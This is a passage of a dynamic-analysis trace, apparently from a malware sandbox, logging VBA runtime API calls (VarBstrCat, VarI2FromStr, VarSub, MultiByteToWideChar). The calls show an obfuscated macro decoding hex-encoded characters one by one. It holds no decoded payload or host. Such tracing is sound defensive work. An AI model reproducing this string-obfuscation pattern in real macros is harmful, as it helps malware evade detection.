returned 0x0 [0175.078] GetUserDefaultLCID () returned 0x409 [0175.078] malloc (_Size=0xa0) returned 0x11f50080 [0175.078] free (_Block=0x11f50080) [0175.079] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.079] GetUserDefaultLCID () returned 0x409 [0175.079] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.079] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.079] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.079] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.079] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.079] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.079] GetUserDefaultLCID () returned 0x409 [0175.079] malloc (_Size=0xa0) returned 0x11f50080 [0175.079] free (_Block=0x11f50080) [0175.080] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.080] GetUserDefaultLCID () returned 0x409 [0175.080] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.080] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.080] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.080] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.080] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.080] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.080] GetUserDefaultLCID () returned 0x409 [0175.081] malloc (_Size=0xa0) returned 0x11f50080 [0175.081] free (_Block=0x11f50080) [0175.081] VarBstrCat (in: bstrLeft="&H", bstrRight="9c", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.081] GetUserDefaultLCID () returned 0x409 [0175.081] VarI2FromStr (in: strIn="&H9c", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.081] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.081] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.081] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.082] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.082] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.082] GetUserDefaultLCID () returned 0x409 [0175.082] malloc (_Size=0xa0) returned 0x11f50080 [0175.082] free (_Block=0x11f50080) [0175.082] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.082] GetUserDefaultLCID () returned 0x409 [0175.082] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.082] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.083] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.083] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.083] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.083] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.083] GetUserDefaultLCID () returned 0x409 [0175.083] malloc (_Size=0xa0) returned 0x11f50080 [0175.083] free (_Block=0x11f50080) [0175.083] VarBstrCat (in: bstrLeft="&H", bstrRight="c2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.083] GetUserDefaultLCID () returned 0x409 [0175.083] VarI2FromStr (in: strIn="&Hc2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.084] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.084] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.084] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.084] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.084] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.084] GetUserDefaultLCID () returned 0x409 [0175.084] malloc (_Size=0xa0) returned 0x11f50080 [0175.084] free (_Block=0x11f50080) [0175.085] VarBstrCat (in: bstrLeft="&H", bstrRight="c4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.085] GetUserDefaultLCID () returned 0x409 [0175.085] VarI2FromStr (in: strIn="&Hc4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.085] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="Q") returned 1 [0175.085] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.085] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.085] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.085] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.085] GetUserDefaultLCID () returned 0x409 [0175.085] malloc (_Size=0xa0) returned 0x11f50080 [0175.085] free (_Block=0x11f50080) [0175.086] VarBstrCat (in: bstrLeft="&H", bstrRight="c2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.086] GetUserDefaultLCID () returned 0x409 [0175.086] VarI2FromStr (in: strIn="&Hc2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.086] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0175.086] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.086] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.086] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.086] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.086] GetUserDefaultLCID () returned 0x409 [0175.086] malloc (_Size=0xa0) returned 0x11f50080 [0175.087] free (_Block=0x11f50080) [0175.087] VarBstrCat (in: bstrLeft="&H", bstrRight="b6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.087] GetUserDefaultLCID () returned 0x409 [0175.087] VarI2FromStr (in: strIn="&Hb6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.087] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.087] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.087] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.087] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.088] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.088] GetUserDefaultLCID () returned 0x409 [0175.088] malloc (_Size=0xa0) returned 0x11f50080 [0175.088] free (_Block=0x11f50080) [0175.088] VarBstrCat (in: bstrLeft="&H", bstrRight="b3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.088] GetUserDefaultLCID () returned 0x409 [0175.088] VarI2FromStr (in: strIn="&Hb3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.088] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0175.088] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.088] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.089] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.089] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.089] GetUserDefaultLCID () returned 0x409 [0175.089] malloc (_Size=0xa0) returned 0x11f50080 [0175.089] free (_Block=0x11f50080) [0175.089] VarBstrCat (in: bstrLeft="&H", bstrRight="e3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.089] GetUserDefaultLCID () returned 0x409 [0175.089] VarI2FromStr (in: strIn="&He3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.089] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.090] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.091] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.091] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.091] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.091] GetUserDefaultLCID () returned 0x409 [0175.091] malloc (_Size=0xa0) returned 0x11f50080 [0175.092] free (_Block=0x11f50080) [0175.092] VarBstrCat (in: bstrLeft="&H", bstrRight="b7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.092] GetUserDefaultLCID () returned 0x409 [0175.092] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.092] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.092] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.092] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.093] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.093] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.093] GetUserDefaultLCID () returned 0x409 [0175.093] malloc (_Size=0xa0) returned 0x11f50080 [0175.093] free (_Block=0x11f50080) [0175.093] VarBstrCat (in: bstrLeft="&H", bstrRight="bf", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.093] GetUserDefaultLCID () returned 0x409 [0175.093] VarI2FromStr (in: strIn="&Hbf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.093] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.094] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.094] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.094] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.094] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.094] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.094] GetUserDefaultLCID () returned 0x409 [0175.094] malloc (_Size=0xa0) returned 0x11f50080 [0175.094] free (_Block=0x11f50080) [0175.094] VarBstrCat (in: bstrLeft="&H", bstrRight="a9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.094] GetUserDefaultLCID () returned 0x409 [0175.094] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.095] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.095] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.095] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.095] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.095] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.095] GetUserDefaultLCID () returned 0x409 [0175.095] malloc (_Size=0xa0) returned 0x11f50080 [0175.095] free (_Block=0x11f50080) [0175.096] VarBstrCat (in: bstrLeft="&H", bstrRight="e5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.096] GetUserDefaultLCID () returned 0x409 [0175.096] VarI2FromStr (in: strIn="&He5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.096] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.096] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.096] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.096] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.096] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.096] GetUserDefaultLCID () returned 0x409 [0175.096] malloc (_Size=0xa0) returned 0x11f50080 [0175.096] free (_Block=0x11f50080) [0175.097] VarBstrCat (in: bstrLeft="&H", bstrRight="cc", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.097] GetUserDefaultLCID () returned 0x409 [0175.097] VarI2FromStr (in: strIn="&Hcc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.097] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.097] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.097] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.097] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.097] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.097] GetUserDefaultLCID () returned 0x409 [0175.098] malloc (_Size=0xa0) returned 0x11f50080 [0175.098] free (_Block=0x11f50080) [0175.098] VarBstrCat (in: bstrLeft="&H", bstrRight="95", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.098] GetUserDefaultLCID () returned 0x409 [0175.098] VarI2FromStr (in: strIn="&H95", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.098] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.098] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.098] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.099] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.099] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.099] GetUserDefaultLCID () returned 0x409 [0175.099] malloc (_Size=0xa0) returned 0x11f50080 [0175.099] free (_Block=0x11f50080) [0175.099] VarBstrCat (in: bstrLeft="&H", bstrRight="b7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.099] GetUserDefaultLCID () returned 0x409 [0175.099] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.099] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: 